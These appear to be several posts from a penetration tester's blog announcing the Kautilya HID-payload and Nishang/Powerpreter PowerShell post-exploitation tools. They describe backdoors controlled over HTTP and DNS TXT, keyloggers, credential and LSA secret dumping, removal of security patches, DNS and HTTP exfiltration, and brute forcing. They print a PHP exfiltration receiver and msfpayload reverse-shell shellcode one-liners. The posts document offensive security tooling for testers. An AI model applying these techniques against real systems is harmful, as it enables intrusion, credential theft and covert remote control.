Kautilya 0.4.5 - Reboot Persistence, DNS TXT exfiltration and more

This update of Kautilya introduces reboot persistence for HTTP Backdoor, DNS TXT Backdoor and Keylogger. The payloads for Windows have been rearranged in five categories making the menu clearer.

Another major improvement has been the addition of DNS TXT exfiltration and HTTP POST exfiltration to your own website. That means, your need not leave credentials of your pastebin/gmail on target.  Note that in case of gmail, you can use application specific passwords. Both of these exfiltration methods were suggested by users.

https://groups.google.com/d/msg/kautilya-users/v6IFWuGYHb8/e-NxnOD_Av8J
https://twitter.com/theart42/status/449891861352960000


So, please keep the feature requests and suggestions coming :)

Persistence
WMI permanent event consumer is included in the code for persistence, But actually, it is not being used by any payload! Why? Because, it requires administrative privileges and both the backdoors run with non-admin privileges. In the case of Keylogger too, only Run registry key is used. Besides the above reason, there is one more catch, the WMI permanenet event consumer we are using, executes the payload with SYSTEM privileges on system reboot while the Keylogger logs keys in the context of the user it runs. This makes it necesarry to run the Keylogger with the privileges of current user and not SYSTEM.

So persistence using WMI is included for future use. Do leave a comment if you think additional payloads needs persistence. It is trivial to do but needs little code changes in .ino or .pde file of that payload.

A powershell script Remove-Persistence.ps1 has been added in the extras directory which could be used to remove persistence added by various payloads in Kautilya.


Exfiltration

DNS TXT Exfiltration

In my lab, 192.168.254.228 is running a BIND DNS Server with querylogging enabled. I used these tutorials for setting it up:

http://ubuntuforums.org/showthread.php?t=236093
http://www.gypthecat.com/how-to-log-bind-queries-on-ubuntu-12-10


Lets use the DNS exfiltration with the "Get Target Credentials" payload (and I am running Kautilya on Windows)

After compiling and uploading the generated payload to a HID, lets connect it a VM, we see this:

The exfiltration method could also be used for bigger data, it simply divides the data and sends multiple queries. I will soon write a separate blog post to cover that.

Now, this data is compressed and encoded using the method found here. To decode it, use Decode.ps1 which has been added to the extras directory.

Great! We were able to exfiltrate data using only DNS TXT queries.

HTTP POST Exfiltration

A VM in my lab is running a simple code, which I got from stackoverflow.

<?php file_put_contents('/var/www/test/test.txt', file_get_contents('php://input')); ?>

Now, lets try this with the WLAN Keys Dump payload.

And we can see this on the web server:

Decoding it using Decode.ps1

Size of the payloads
Those who take interest in source code of Kautilya may notice that all the payloads have been made more modular. It means, if you chose not to do exfiltration the payload would be much smaller now, unlike earlier. Same goes for persistemce. This makes it easier to use payloads of Kautilya on various devices.


Here is the full CHANGELOG

0.4.5
- Bug fixes and improvements in Time Based Exec. It now supports exfiltration and could be stopped remotely.
- Less lines of code for HTTP Backdoor and Download Execute PS.
- HTTP Backdoor, Download Execute PS, Hashdump and Exfiltrate and Dump LSA Secrets now execute the downloaded script in memory.
- Shortened parameters passed to powershell.exe when the scripts are called. Thus, saving the time in "typing" by HID.
- Added two new exfiltration options, POST requests and DNS TXT records.
- Username and password for exfiltration would be asked only if you select gmail or pastebin.
- Tinypaste as an option for exfiltration has been removed.
- Payloads have been made more modular which results in smaller size.
- Reboot Persistence has been added to HTTP Backdoor and DNS TXT Backdoor.
- Menu redesign.
- Bug fix in Dump LSA Secrets payload.
- Added ./extras/Decode.ps1. Use this to decode data exfiltrated by HTTP Backdoor and DNS TXT Backdoor.
- Added ./extras/Remove-Persistence.ps1. Use this to remove persistence by Keylogger, HTTP Backdoor and DNS TXT Backdoor.
- Kautilya could be run on Windows if win32console gem is installed.


You can find kautilya here: http://code.google.com/p/kautilya/source/browse/trunk

As always, I welcome feedback, bugs and feature requests.

Pivoting to and poking other computers using powershell - Powerpreter and Nishang 0.3.1 - Part 2

This is second post in the series about powerpreter. You can read the first part here: http://www.labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html

We can use Powerpreter to pivot to and poke other machines in a network. The assumption here is that we have local admin access to a machine in a network. That admin happens to have access to other machines in the network (as in many enterprise environments).

Pivot

Powerpreter contains Pivot functionality. It depends on Powershell Remoting to function. It means all which could be done using Pivot could be done even with Invoke-Command too. In fact, Pivot is just a wrapper around Invoke-Command.

Pivot could be used in both interactive and non-interactive mode. We can use username and password or use credentials of current session (for example, using a WCE generated powershell session).

Lets see a non-interactive Pivot to a single machine.

We can use it on multiple machines too. Lets see a non-interactive Pivot to multiple machines.

Nice and easy, isn't it.


Non-interactive is good but nothing beats an interactive session on a machine :) Let see interactive pivoting on multiple machines with a WCE-generated powershell (using password hashes).

Nice, we have two sessions with us. We can use Get-PSSession cmdlet to list the sessions. To interact with a session use Use-Session function of powerpreter.

We can use built-in cmdlet Enter-PSSession to interact, then why we have a separate function for similar thing in powerpreter? This happens when one tries to use Enter-PSSession from a powershell remoting session.

Points to note in above example:
1. When using Pivot from remote, note that we used username in form of "computer\username".
2. We got an error while trying to use Enter-PSSession from remote session, AFAIK it is not supported.
3. But Use-Session from powerpreter worked!

Why did Use-Session work?

  function Use-Session
{
<#
.SYNOPSIS
Function which could be used to interact with sessions created using Pivot.

.DESCRIPTION
The functionality allows to interact with sessions created using the Pivot function. Use Get-PSSSession to
list the sessions created using Pivot.

.PARAMETER id
ID of the session to interact with. 

.EXAMPLE
PS > Use-Session -id <id>
Above command uses the credentials available with current powershell session (or other shell) to connect to target.
It creates PSSsessions. Use Use-Session to interact with the created sessions.

.LINK
http://code.google.com/p/nishang
#>
Param ( [Parameter(Position = 0, Mandatory = $True)] $id)

    while($cmd -ne "exit")
    {
        $sess = Get-PSSession -Id $id
        $computername = $sess.ComputerName
        write-host -NoNewline "$computername> "
        $cmd = read-host
        $sb = [scriptblock]::Create($cmd)
        Invoke-Command -ScriptBlock $sb -Session $sess
    }
}

Invoke-Command is supported from a powershell remoting session. We are using it with -Session parameter to save state and use it interactively.

Now, lets have a look at couple more functionalities in powerpreter which could be used to poke other machines in the network.

Port-Scan
As the name suggest we can use this to port scan other machines on a network.

Please note that we used the parameter -ScanPort to specify that we want a port scan, by default only a ping sweep is performed. There is a default port range which would be scanned but a custom port range could also be provided.

Lets look for a MSSQL Server on the network.

Bingo! We found one - already setup ;)

Brute-Force
We can use this to Brute Force services like MSSQL, ActiveDirectory, Web or FTP on other machines. Default service is MSSQL. Lets brute force with sa username on above discovered server.

Yay we got one password! - this too has been setup already ;)

As you can see we could use a list of password (also IP and username) instead of using a single password. There is a small catch here, the password list should start with the word "password" like this.

Why? Have a look at the code snippet.

Param(
    [Parameter(Mandatory = $true,
      Position = 0,
      ValueFromPipeLineByPropertyName = $true)]
    [Alias("PSComputerName","CN","MachineName","IP","IPAddress","ComputerName","Url","Ftp","Domain","DistinguishedName")]
    [string]$Identity,

    [parameter(Position = 1,
      ValueFromPipeLineByPropertyName = $true)]
    [string]$UserName,

    [parameter(Position = 2,
      ValueFromPipeLineByPropertyName = $true)]
    [string]$Password,

    [parameter(Position = 3)]
    [ValidateSet("SQL","FTP","ActiveDirectory","Web")]
    [string]$Service = "SQL"
  )

It is due to the ValueFromPipeLineByPropertyName property. See this for more details: http://blogs.msdn.com/b/powershell/archive/2009/01/05/revisiting-old-posts-get-process-dir-about-valuefrompipelinebypropertyname.aspx

Execute-Command-MSSQL
Ok we have username and password for the MSSQL Server, what next? See this earlier post to understand usage of Execute-Command-MSSQL: http://www.labofapenetrationtester.com/2012/12/command-execution-on-ms-sql-server-using-powershell.html 

Create-Multiple-Session
Function which can check for credentials on remote computers and can open PSSessions if the credentials work. See this old post to understand its working: http://www.labofapenetrationtester.com/2013/04/poshing-the-hashes.html

There are some code changes to powerpreter and other scripts in Nishang. So I am releasing Nishang 0.3.1 too. You can find the repository here: http://code.google.com/p/nishang/

As always I would like feedback, bugs, feature request and code contributions. Enjoy.

Kautilya 0.4.4 - dump lsa secrets, introduce vulns, improved backdoors and more

Here comes  Kautilya 0.4.4. This version adds three new payloads and improves couple of others.

Download and Execute Powerhell Script - As the name suggests this script downloads a powershell script and executes it on the target.

Remove Update - Remove all or security or a specific hotfix from the target. Great way to introduce vulnerability on a target.

LSA Secrets - Dump LSA Secrets from a victim. The payload detects 32-bit or 64-bit machine and calls the proper version of powershell accordingly.

I am always looking for contributors, if you want to contribute to Kautilya (or Nishang) do not hesitate to contact me.

Please refer to the CHANGELOG below for details.

0.4.4
- Added "Download and Execute Powershell Script" windows payload.
- Added "Remove Update" windows payload.
- Added "LSA Secrets" windows payload.
- Updated "DNS TXT Backdoor". It is much more easy to use now.
- Renamed Wait for Command to HTTP Backdoor
- HTTP Backdoor now keeps running till the stopstring is matched.
- An option has been added for no exfiltration of data. Choose 0 when Kautilya asks for exfil option.

Please update your repos or download the source from the repository here http://code.google.com/p/kautilya/

On a related note, Paul - the maker of Teensy pushed some updates for non-English keyboards. See the thread here (Thanks to Lorenz for reporting this): http://forum.pjrc.com/threads/23688-Possible-bug-with-windows-and-a-German-keyboard-layout. Please let me know if it helps with the problems for non-English keyboard users.

 Please feel free to report bugs and feedback.

(Introducing) Powerpreter and Nishang 0.3.0 : Easy post exploitation using powershell - Part 1

This post is all about what I was unable to discuss during my talk at Defcon 21 "Powerpreter: Post Exploitation like a boss". In 45 minutes one can only highlight limited things, so this and some more posts would try to fill the gaps left during the talk.

Posts planned in this series are:
Introducing Powerpreter and Nishang 0.3.0 : Easy post exploitation using powershell - Part 1
Powerpreter and Nishang 0.3.0 : Pivoting and poking other computers - Part 2
Powerpreter and Nishang 0.3.0 : Persistence - Part 3
Powerpreter and Nishang 0.3.0 : Various methods to deploy and use - Part 4
Introducing Antak, Powerpreter and Nishang 0.3.0 : A webshell in powershell - Part 5
UPDATE: I have decided to finish the series in three parts. Part 4 and Part 5 would be posted as independent posts.

Powerpreter is a powershell module. I decided to make it a part of Nishang as there is a large amount of repeated code. This post assumes that we have Administrative access to a Windows 7 machine. Powerpreter can surely be used as a non-admin user but obviously with limited (but still useful as seen in below examples) functionalities. Like other scripts in Nishang, I have tried my best to keep powerpreter compatible to powershellv2 so you may see some code which could be done by a cmdlet in powershellv3 and v4.

Once we have access to a machine, powerpreter could be downloaded and imported in a powershell session for further fun. For using hashes or credentials with powershell remoting see my previous posts:
http://labofapenetrationtester.blogspot.in/2013/04/poshing-the-hashes.html
http://labofapenetrationtester.blogspot.in/2013/05/poshing-hashes-part-2.html

 From a powershell remoting session:

Now, to list the methods in the imported module:

Get-Command -Module powerpreter

We can list help for each function by using help. For example to get help for Check-VM

help Check-VM -full

Now, lets have a look at some of these methods/commands/payloads. Some of the payloads in powerpreter have already been explained in blog posts about Nishang. I will explain only couple of those and some new functionality in powerpreter:

Take Get-WLAN-Keys for example

You can also use -exfil option if you would like to exfiltrate info to pastebin/gmail/tinypaste. See this for more detail: http://labofapenetrationtester.blogspot.in/2013/06/nishang-0-2-7.html


Enable-DuplicateToken, Get-PassHashes and Get-LsaSecret.

Use Enable-DuplicateToken to escalate to SYSTEM and then use Get-PassHases or Get-LsaSecret depending on your requirement.

EnableDuplicateToken;Get-PassHashes

Let's see it in action from a meterpreter.

First we download the powerpreter. I use -encodedcommand option with powershell.exe in meterpreter to avoid any issues. StringtoBase64 in powerpreter could be used for this.

 

In case of Get-LsaSecret on 64-bit machine, 32-bit powershell needs to be run. So use this path for powershell.exe: C:\Windows\SysWOW64\WindowsPowerShell\v1.0 from powershell remoting session. But while using meterpreter if the process on target is 32-bit, no need to specifically call 32-bit powershell.

Get-LsaSecret is written by Niklas Goude and Get-Passhashes by David Kennedy



HTTP-Backdoor

This backdoor can be controlled using a website whose content could be changed. Lets use pastebin for this.

It asks for four parameters. It keeps polling the url provided in CheckURL option for a string, provided in the Magicstring option. As soon as the string matches, it pulls a powershell script/command from PayloadURL.

Differents commands or scripts can be executed by changing the payloads in PayloadURL. After a sucessful execution, it waits for 60 seconds before polling again to avoid generating too much traffic.
The backdoor starts in a new process. With -exfil option, results of the backdoor could be exfiltrated.

This is how the backdoor process will look to naked eyes.

DNS TXT Backdoor
This backdoor uses DNS TXT records for receiving commands and scripts to execute as well as instructions to stop and start.

The backoor asks for various options. StartDomain is the one which would be polled by the backdoor for instructions. Three possibilities are present

1. If txt record at Startdomain matches cmdstring, the backdoor will query txt record of commanddomain to look for a oneline command and will execute it on the target.
2. If txt record at Startdomain matches psstring, the backdoor will look base64 encoded powershell script in txt record of psdomain.
3. If txt record of Startdomain matches stopstring the payload stops.

As in case of HTTP-Backdoor this backdoor also runs in a new process and could use -exfil option. The below example shows a usage of backdoor.

We executed Get-Service on the target and results were exfiltrated to gmail.

Now lets have a look at Keylogger. Unfortunately, this does not work from a powershell remoting session. Lets run it from a meterpreter session.

The keylogger logs keys to a file in user temp directory of the target. The logged keys could be parsed using Parse_Keys script in Nishang. If you use -exfil option and select gmail , the key.log file would be sent as an attachment to the given gmail id.To avoid sending same keys repeatedly, after 30 reads key.log is flushed out.

DNS TXT Code Execution
This payload could be used to pull shellcode from DNS TXT records. The shellcode is then executed in memory. We have to provide different domains for 32-bit and 64-bit shellcode. The payload will determine the architecture during execution and pull the shellcode accordingly.

We could use the command given in help of the payload to generate the shellcode using msf.

./msfpayload windows/meterpreter/reverse_tcp LHOST=<ip> EXITFUNC=process C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'

./msfpayload windows/x64/meterpreter/reverse_tcp LHOST=<ip> EXITFUNC=process C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'

Lets see this in action on a 64-bit machine.

 

On the listener console:

The code execution code is written by Matt Graeber.

UPDATE: Since many of you asked - HTTP-Backdoor, DNS TXT Backdoor, Keylogger and DNS TXT Code Execution - all could be used by a non-admin user. Though to use powershell remoting we must have admin access to the remote machine, unless configured otherwise. So, if we have non-admin shell access to a machine we can still use above.

Special thanks to Lee Holmes for going through my ugly coding of powerpreter and suggesting changes.

Ok, that is enough in this post about Powerpreter. As powerpreter is going to be a part of Nishang, I would like to announce an updated version Nishang 0.3.0. Changes could be found in the CHANGELOG below.

- Added Powerpreter
- Added Execute-DNSTXT-Code
- Bug fix in Create-MultipleSessions.
- Changes to StringToBase64. It now supports Unicode encoding which makes it usable with -Encodedcommand
- More Changes to StringToBase64. Now a file can be converted.
- Added Copy-VSS
- Information_Gather shows output in better format now.
- Information_Gather renamed to Get-Information.
- Wait for command renamed to HTTP-Backdoor.
- Time_Execution renamed Execute-OnTime
- Invoke-PingSweep renamed to Port-Scan
- Invoke-Medusa renamed to Brute-Force


You can get Nishang and powerpreter here: http://code.google.com/p/nishang

BTW Nishang has a logo of its own now :) Please let me know how you found it to be. It is "designed" in powerpoint and the background was removed using lunapic.com

Also, if you are looking for slides of my talk at Defcon, they are here:
http://labofapenetrationtester.blogspot.in/p/blog-page.html

Hope you enjoyed this post and it would be useful. As always, please let me know about bugs, feedback and feature requests.

Kautilya 0.4.3 - New exfiltration methods, faster payloads and call for contributors

While using Kautilya in penetration tests, one shortcoming of Kautilya always bug me. It is data exfiltration is with pastebin only. Specially with Keylogger module, the support only for pastebin reduces it to a PoC only thing. Not anymore, I give you Kautilya 0.4.3!

From this version onwards, Kautilya supports pastebin, gmail and tinypaste across all payloads which need to communicate with the internet. No more 10 posts limit which pastebin enforces. Gmail is the recommended choice for the keylogger payload because of the number of pastes or posts it does. If you have enabled two factor authentication for a gmail account, just generate a application specific password and use it with a payload, it works fine.

Tinypaste is also a good one as there are no limits on pasting.

Also, I have (finally) trimmed the variable names in powershell scripts which are generated by Kautilya. It means faster "typing" of payloads on a target. Enjoy!

If you want to contribute to Kautilya, contact me! You will be credited and there is guranteed fun.

Here is the CHANGELOG for Kautilya 0.4.3:

- Names of various payloads have been changed, mostly to remove pastebin from the name.
- Shortened variables names and poweshell cmdlets names in many payloads. Payloads are "typed" much faster by HID now.
- Fixed a bug on Get Target Credentials payload.
- Fixed a bug in DNS TXT Backdoor.
- Hashdump payload now uses TokenDuplication and does not schedules a task on the target, this means the payload is faster now.
- New communication options added to various payloads which exports data to pastebin/gmail/tinypaste.
- Posts to pastebin now use HTTPS.

You can get Kautilya from the google code repository.

As always, I look forward to comments, feedback and feature requests.